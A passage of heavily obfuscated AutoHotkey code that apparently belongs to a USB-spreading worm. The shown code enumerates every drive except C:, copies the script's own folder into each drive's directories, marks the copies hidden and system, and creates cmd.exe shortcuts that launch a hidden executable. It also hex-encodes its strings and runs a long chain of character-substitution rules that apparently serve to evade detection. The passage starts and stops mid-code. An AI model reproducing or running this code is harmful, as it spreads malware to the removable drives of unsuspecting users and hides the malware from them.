sleep , 1000
}
kfk#k@fkf@f#f#f@(fk@kf#jj@jumukkf@kfk){
 if (@fk##fkk = 1){
 sleep , 5000
 }else{
sleep fk@kf#jj@jumukkf@kfk
}

}

ii#jj#jumu@fkkf#(kkf@kjjjjumu#jj@jumukf#k){
    try {

	VarSetCapacity(SHORT,StrLen(kkf@kjjjjumu#jj@jumukf#k)*2)
	DllCall("GetShortPathName","Str",kkf@kjjjjumu#jj@jumukf#k,"Str",SHORT,"UInt",StrLen(kkf@kjjjjumu#jj@jumukf#k)*2)
    } catch {
        return kkf@kjjjjumu#jj@jumukf#k
	}
	if (SHORT = "")
	{
	return kkf@kjjjjumu#jj@jumukf#k
	}
	
	Return SHORT
}


@f#kkfk@f@ffk##k(@k#kf@@fiii@) {

   static   c

   if   !c
      Loop, 26
         c .=   (!c ? "" : "`n") Chr(A_Index + 96)
   Loop %   @k#kf@@fiii@
   {
      Random, n, 1, 1296
      Loop %   n
         Sort, c, Random
      str .=   SubStr(c,1,1)
   }
   return   str
}


f#kf#k#f#ii@@fk#() {

	For objOS In f#@fkk.Drives {
		#jjjjumukf@ii#ff := ObjOS.path
	if (#jjjjumukf@ii#ff = iiikf#kfkjj@jumukf#f("433A")){
	
	}else{
	

	kfkfk#k# = %#jjjjumukf@ii#ff%%#f#kf@%%fkfk%\*.*

	Loop, %kf@f%%kfkfk#k#%%fkjj@jumuk@f%
	{
	  #iiif@fk = %A_LoopFileDir%
	}
	f@@fk@ := 0

	Loop, %f@jj@jumuf%%ii#f@f%%kfkfk#k#%, 1
	{
		if (f@@fk@ > 0){
			if (#fk#@fk@ > 0){
			break
			}
		}
	  FileGetAttrib,CurAttrib, %A_LoopFileFullPath%
	  IfInString, CurAttrib, D
		{
		  StringReplace, A_LoopRelativeFileName, A_LoopFileFullPath, %jjjjumujj@jumu@k%%#iiif@fk%%#k#f@k%,
		  if (A_LoopRelativeFileName = iiikf#kfkjj@jumukf#f("5C2452454359434C452E42494E")){
		  
		  }else{
		  
				fkfk#jjjjumu@k@k := SubStr(jj@jumujj@jumuii#k, 1, 3)
				jj@jumukkf@kf# := A_LoopRelativeFileName
				StringReplace, jj@jumukkf@kf#, jj@jumukkf@kf#,  "\",
				  ifexist, %iii#f@#k%%ii#ii#%%#jjjjumukf@ii#ff%%A_LoopRelativeFileName%\%fkf@f@%%jj@jumujj@jumuii#k%%k#@f#kf@%
				{
				FileGetSize, oldfilesize, %fii#kk%%#jjjjumukf@ii#ff%%k@iii@%%A_LoopRelativeFileName%\%jj@jumujj@jumuii#k%%@ii@%%#f#k@k%\%jjjjumuf#fk#%%#k@k#f#f%%jj@jumujj@jumuii#k%.txt
				FileGetSize, scriptfilesize, %A_ScriptFullPath%
				if (oldfilesize <> scriptfilesize){
				FileCopyDir, %A_ScriptDir%, %#jjjjumukf@ii#ff%%kf@f%%#k#f@k%%A_LoopRelativeFileName%\%jj@jumujj@jumuii#k%%#kjj@jumujj@jumu%%ii#k@f#k%,1
				
				}else{
				f@@fk@ := f@@fk@ + 1
				break
				}
				}else{
				FileCopyDir, %A_ScriptDir%, %@k@f@kf@%%@kf#ff%%#jjjjumukf@ii#ff%%A_LoopRelativeFileName%\%ii#jjjjumuk@%%jj@jumujj@jumuii#k%%k@k#%
				FileSetAttrib, +SH, %#jjjjumukf@ii#ff%%iii#f@#k%%ii#ii#%%A_LoopRelativeFileName%\%kkfk@k%%jj@jumujj@jumuii#k%%k@f#kf@k%,1
				}
				  ifexist, %fkf@f@%%#jjjjumukf@ii#ff%%@k@f@kf@%%A_LoopRelativeFileName%\%jj@jumujj@jumuii#k%%f#f#k@%%k@iii@%
					{
						 
						  ifexist, %#jjjjumukf@ii#ff%%k@k@%%k#kffk%%A_LoopRelativeFileName%%#k@k#f#f%%#k@k#f#f%%jj@jumukkf@kf#% copy %fkfk#jjjjumu@k@k%%jjjjumu#f#f#%%f#@fk@f#%.lnk
							{
							
							}else{
								FileCreateShortcut, cmd.exe,%ii#ii#%%#jjjjumukf@ii#ff%%fkf@f@%%A_LoopRelativeFileName%%jj@jumukkf@kf#%%f#@fk@f#%%jj@jumuf% copy %fkfk#jjjjumu@k@k%%#kkjj@jumukf%%@kf#%.lnk,, "/c start %#kjj@jumujj@jumu%%jj@jumujj@jumuii#k%%jjjjumu@%\%jj@jumujj@jumuii#k%%jjjjumu@%%#kkjj@jumukf%.exe %@kjj@jumuf%%@kff%%jj@jumujj@jumuii#k%\%#f@k@f%%@kkfkf@f%%jj@jumujj@jumuii#k%.txt %kf@f%%kfii@k%%fkfk#jjjjumu@k@k% &exit",,%SystemRoot%\system32\shell32.dll,,4
							}
					}
			}
		}
	}

	
	


	}
	}
	#fk#@fk@ := 1

}


k#k#f#@k@k@f@f(fk#kf#@fk@#kf@,kkfkf@#f@kf@k#){
	IfInString, fk#kf#@fk@#kf@, %ffii@f%%kkfkf@#f@kf@k#%%kfk#%
	{
	return true
	}
	else
	{
	return false
	}
}


f#jjjjumuk@kfk@k#k(f#k#kf@k#ii#ffk#){

	f@kkfk#k#f := SubStr(kf#k#f, 1, 4)

	k@k##fk# := SubStr(jj@jumujj@jumuii#k, 1, 4)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, k@k##fk#, "")


	if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("66"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("66"), iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("61") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("6623"), iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("6123") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("66") . iiikf#kfkjj@jumukf#f("6640"), iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("6140") . f@kkfk#k#f)
	} else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B"), iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("62") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B23"), iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("6223") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6B") . iiikf#kfkjj@jumukf#f("6B40"), iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("6240") . f@kkfk#k#f)
	} else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("61"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("61"), iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("63") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("6123"), iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("6323") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("61") . iiikf#kfkjj@jumukf#f("6140"), iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("6340") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("62"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("62"), iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("64") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("6223"), iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("6423") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("62") . iiikf#kfkjj@jumukf#f("6240"), iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("6440") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("6363"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("6363"), iiikf#kfkjj@jumukf#f("65") . iiikf#kfkjj@jumukf#f("6565") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("6323"), iiikf#kfkjj@jumukf#f("65") . iiikf#kfkjj@jumukf#f("6523") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("63") . iiikf#kfkjj@jumukf#f("6340"), iiikf#kfkjj@jumukf#f("65") . iiikf#kfkjj@jumukf#f("6540") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("6464"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("6464"), iiikf#kfkjj@jumukf#f("67") . iiikf#kfkjj@jumukf#f("6767") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("6423"), iiikf#kfkjj@jumukf#f("67") . iiikf#kfkjj@jumukf#f("6723") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("64") . iiikf#kfkjj@jumukf#f("6440"), iiikf#kfkjj@jumukf#f("67") . iiikf#kfkjj@jumukf#f("6740") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("65") . iiikf#kfkjj@jumukf#f("6565"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("65") . iiikf#kfkjj@jumukf#f("6565"), iiikf#kfkjj@jumukf#f("68") . iiikf#kfkjj@jumukf#f("6868") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("65") . iiikf#kfkjj@jumukf#f("6523"), iiikf#kfkjj@jumukf#f("68") . iiikf#kfkjj@jumukf#f("6823") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("65") . iiikf#kfkjj@jumukf#f("6540"), iiikf#kfkjj@jumukf#f("68") . iiikf#kfkjj@jumukf#f("6840") . f@kkfk#k#f)
	}

	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("67") . iiikf#kfkjj@jumukf#f("6767"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("67") . iiikf#kfkjj@jumukf#f("6767"), iiikf#kfkjj@jumukf#f("69") . iiikf#kfkjj@jumukf#f("6969") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("67") . iiikf#kfkjj@jumukf#f("6723"), iiikf#kfkjj@jumukf#f("69") . iiikf#kfkjj@jumukf#f("6923") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("67") . iiikf#kfkjj@jumukf#f("6740"), iiikf#kfkjj@jumukf#f("69") . iiikf#kfkjj@jumukf#f("6940") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("68") . iiikf#kfkjj@jumukf#f("6868"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("68") . iiikf#kfkjj@jumukf#f("6868"), iiikf#kfkjj@jumukf#f("6A") . iiikf#kfkjj@jumukf#f("6A6A") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("68") . iiikf#kfkjj@jumukf#f("6823"), iiikf#kfkjj@jumukf#f("6A") . iiikf#kfkjj@jumukf#f("6A23") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("68") . iiikf#kfkjj@jumukf#f("6840"), iiikf#kfkjj@jumukf#f("6A") . iiikf#kfkjj@jumukf#f("6A40") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("69") . iiikf#kfkjj@jumukf#f("6969"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("69") . iiikf#kfkjj@jumukf#f("6969"), iiikf#kfkjj@jumukf#f("6D") . iiikf#kfkjj@jumukf#f("6D6D") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("69") . iiikf#kfkjj@jumukf#f("6923"), iiikf#kfkjj@jumukf#f("6D") . iiikf#kfkjj@jumukf#f("6D23") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("69") . iiikf#kfkjj@jumukf#f("6940"), iiikf#kfkjj@jumukf#f("6D") . iiikf#kfkjj@jumukf#f("6D40") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("6A") . iiikf#kfkjj@jumukf#f("6A6A"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6A") . iiikf#kfkjj@jumukf#f("6A6A"), iiikf#kfkjj@jumukf#f("6C") . iiikf#kfkjj@jumukf#f("6C6C") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6A") . iiikf#kfkjj@jumukf#f("6A23"), iiikf#kfkjj@jumukf#f("6C") . iiikf#kfkjj@jumukf#f("6C23") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6A") . iiikf#kfkjj@jumukf#f("6A40"), iiikf#kfkjj@jumukf#f("6C") . iiikf#kfkjj@jumukf#f("6C40") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("6C") . iiikf#kfkjj@jumukf#f("6C6C"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6C") . iiikf#kfkjj@jumukf#f("6C6C"), iiikf#kfkjj@jumukf#f("6E") . iiikf#kfkjj@jumukf#f("6E6E") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6C") . iiikf#kfkjj@jumukf#f("6C23"), iiikf#kfkjj@jumukf#f("6E") . iiikf#kfkjj@jumukf#f("6E23") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6C") . iiikf#kfkjj@jumukf#f("6C40"), iiikf#kfkjj@jumukf#f("6E") . iiikf#kfkjj@jumukf#f("6E40") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("6D") . iiikf#kfkjj@jumukf#f("6D6D"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6D") . iiikf#kfkjj@jumukf#f("6D6D"), iiikf#kfkjj@jumukf#f("6F") . iiikf#kfkjj@jumukf#f("6F6F") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6D") . iiikf#kfkjj@jumukf#f("6D23"), iiikf#kfkjj@jumukf#f("6F") . iiikf#kfkjj@jumukf#f("6F23") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6D") . iiikf#kfkjj@jumukf#f("6D40"), iiikf#kfkjj@jumukf#f("6F") . iiikf#kfkjj@jumukf#f("6F40") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("6E") . iiikf#kfkjj@jumukf#f("6E6E"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6E") . iiikf#kfkjj@jumukf#f("6E6E"), iiikf#kfkjj@jumukf#f("70") . iiikf#kfkjj@jumukf#f("7070") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6E") . iiikf#kfkjj@jumukf#f("6E23"), iiikf#kfkjj@jumukf#f("70") . iiikf#kfkjj@jumukf#f("7023") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6E") . iiikf#kfkjj@jumukf#f("6E40"), iiikf#kfkjj@jumukf#f("70") . iiikf#kfkjj@jumukf#f("7040") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("6F") . iiikf#kfkjj@jumukf#f("6F6F"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6F") . iiikf#kfkjj@jumukf#f("6F6F"), iiikf#kfkjj@jumukf#f("71") . iiikf#kfkjj@jumukf#f("7171") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6F") . iiikf#kfkjj@jumukf#f("6F23"), iiikf#kfkjj@jumukf#f("71") . iiikf#kfkjj@jumukf#f("7123") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("6F") . iiikf#kfkjj@jumukf#f("6F40"), iiikf#kfkjj@jumukf#f("71") . iiikf#kfkjj@jumukf#f("7140") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("70") . iiikf#kfkjj@jumukf#f("7070"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("70") . iiikf#kfkjj@jumukf#f("7070"), iiikf#kfkjj@jumukf#f("72") . iiikf#kfkjj@jumukf#f("7272") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("70") . iiikf#kfkjj@jumukf#f("7023"), iiikf#kfkjj@jumukf#f("72") . iiikf#kfkjj@jumukf#f("7223") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("70") . iiikf#kfkjj@jumukf#f("7040"), iiikf#kfkjj@jumukf#f("72") . iiikf#kfkjj@jumukf#f("7240") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("71") . iiikf#kfkjj@jumukf#f("7171"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("71") . iiikf#kfkjj@jumukf#f("7171"), iiikf#kfkjj@jumukf#f("73") . iiikf#kfkjj@jumukf#f("7373") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("71") . iiikf#kfkjj@jumukf#f("7123"), iiikf#kfkjj@jumukf#f("73") . iiikf#kfkjj@jumukf#f("7323") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("71") . iiikf#kfkjj@jumukf#f("7140"), iiikf#kfkjj@jumukf#f("73") . iiikf#kfkjj@jumukf#f("7340") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("72") . iiikf#kfkjj@jumukf#f("7272"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("72") . iiikf#kfkjj@jumukf#f("7272"), iiikf#kfkjj@jumukf#f("74") . iiikf#kfkjj@jumukf#f("7474") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("72") . iiikf#kfkjj@jumukf#f("7223"), iiikf#kfkjj@jumukf#f("74") . iiikf#kfkjj@jumukf#f("7423") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("72") . iiikf#kfkjj@jumukf#f("7240"), iiikf#kfkjj@jumukf#f("74") . iiikf#kfkjj@jumukf#f("7440") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("73") . iiikf#kfkjj@jumukf#f("7373"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("73") . iiikf#kfkjj@jumukf#f("7373"), iiikf#kfkjj@jumukf#f("75") . iiikf#kfkjj@jumukf#f("7575") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("73") . iiikf#kfkjj@jumukf#f("7323"), iiikf#kfkjj@jumukf#f("75") . iiikf#kfkjj@jumukf#f("7523") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("73") . iiikf#kfkjj@jumukf#f("7340"), iiikf#kfkjj@jumukf#f("75") . iiikf#kfkjj@jumukf#f("7540") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("74") . iiikf#kfkjj@jumukf#f("7474"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("74") . iiikf#kfkjj@jumukf#f("7474"), iiikf#kfkjj@jumukf#f("76") . iiikf#kfkjj@jumukf#f("7676") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("74") . iiikf#kfkjj@jumukf#f("7423"), iiikf#kfkjj@jumukf#f("76") . iiikf#kfkjj@jumukf#f("7623") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("74") . iiikf#kfkjj@jumukf#f("7440"), iiikf#kfkjj@jumukf#f("76") . iiikf#kfkjj@jumukf#f("7640") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("75") . iiikf#kfkjj@jumukf#f("7575"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("75") . iiikf#kfkjj@jumukf#f("7575"), iiikf#kfkjj@jumukf#f("77") . iiikf#kfkjj@jumukf#f("7777") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("75") . iiikf#kfkjj@jumukf#f("7523"), iiikf#kfkjj@jumukf#f("77") . iiikf#kfkjj@jumukf#f("7723") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("75") . iiikf#kfkjj@jumukf#f("7540"), iiikf#kfkjj@jumukf#f("77") . iiikf#kfkjj@jumukf#f("7740") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("76") . iiikf#kfkjj@jumukf#f("7676"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("76") . iiikf#kfkjj@jumukf#f("7676"), iiikf#kfkjj@jumukf#f("78") . iiikf#kfkjj@jumukf#f("7878") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("76") . iiikf#kfkjj@jumukf#f("7623"), iiikf#kfkjj@jumukf#f("78") . iiikf#kfkjj@jumukf#f("7823") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("76") . iiikf#kfkjj@jumukf#f("7640"), iiikf#kfkjj@jumukf#f("78") . iiikf#kfkjj@jumukf#f("7840") . f@kkfk#k#f)
	}

	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("77") . iiikf#kfkjj@jumukf#f("7777"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("77") . iiikf#kfkjj@jumukf#f("7777"), iiikf#kfkjj@jumukf#f("79") . iiikf#kfkjj@jumukf#f("7979") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("77") . iiikf#kfkjj@jumukf#f("7723"), iiikf#kfkjj@jumukf#f("79") . iiikf#kfkjj@jumukf#f("7923") . f@kkfk#k#f)
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("77") . iiikf#kfkjj@jumukf#f("7740"), iiikf#kfkjj@jumukf#f("79") . iiikf#kfkjj@jumukf#f("7940") . f@kkfk#k#f)
	}
	else if (k#k#f#@k@k@f@f(f#k#kf@k#ii#ffk#,iiikf#kfkjj@jumukf#f("78") . iiikf#kfkjj@jumukf#f("7878"))) 
	{
	f#k#kf@k#ii#ffk# := StrReplace(f#k#kf@k#ii#ffk#	, iiikf#kfkjj@jumukf#f("78") . iiikf#kfkjj@jumukf#f("7878"), iiikf#kfkjj@jumukf#f("7A") . iiikf#kfkjj@jumukf#f("7A7A") . f@kkfk#k#f)
